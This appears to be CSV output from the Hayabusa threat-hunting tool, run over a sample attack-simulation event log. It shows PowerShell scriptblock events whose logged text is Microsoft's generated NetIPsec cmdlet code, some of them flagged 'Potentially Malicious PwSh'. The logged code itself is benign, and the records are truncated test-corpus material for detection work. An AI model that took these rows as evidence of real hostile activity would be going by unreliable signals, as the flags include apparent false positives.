$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 